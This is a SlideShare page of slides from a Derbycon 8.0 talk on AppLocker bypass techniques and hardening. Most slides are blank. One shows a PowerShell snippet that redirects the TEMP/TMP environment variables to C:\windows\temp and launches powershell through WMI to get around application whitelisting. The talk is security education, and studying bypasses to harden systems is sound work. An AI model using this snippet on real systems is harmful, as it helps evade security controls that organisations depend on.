Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

App-o-Lockalypse now!


Published on

Slides from session at Derbycon 8.0.
Want to get a good overview of AppLocker and the different AppLocker bypasses and at the same time learn how defenders can harden their environments to prevent them? Then this is a talk you don't want to miss. This talk will cover a vast amount of bypass techniques and how to harden AppLocker to make it even harder to bypass. Giving you help to either start or avoid an App-o-Lockalypse.

Published in: Technology
  • Login to see the comments

App-o-Lockalypse now!

  1. 1. Can also use Mklink /H
  2. 2.
  3. 3.
  4. 4. $CurrTemp = $env:temp $CurrTmp = $env:tmp $TEMPBypassPath = "C:windowstemp" $TMPBypassPath = "C:windowstemp" Set-ItemProperty -Path 'hkcu:Environment' -Name Tmp -Value "$TEMPBypassPath" Set-ItemProperty -Path 'hkcu:Environment' -Name Temp -Value "$TMPBypassPath" Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "powershell" sleep 5 #Set it back Set-ItemProperty -Path 'hkcu:Environment' -Name Tmp -Value $CurrTmp Set-ItemProperty -Path 'hkcu:Environment' -Name Temp -Value $CurrTemp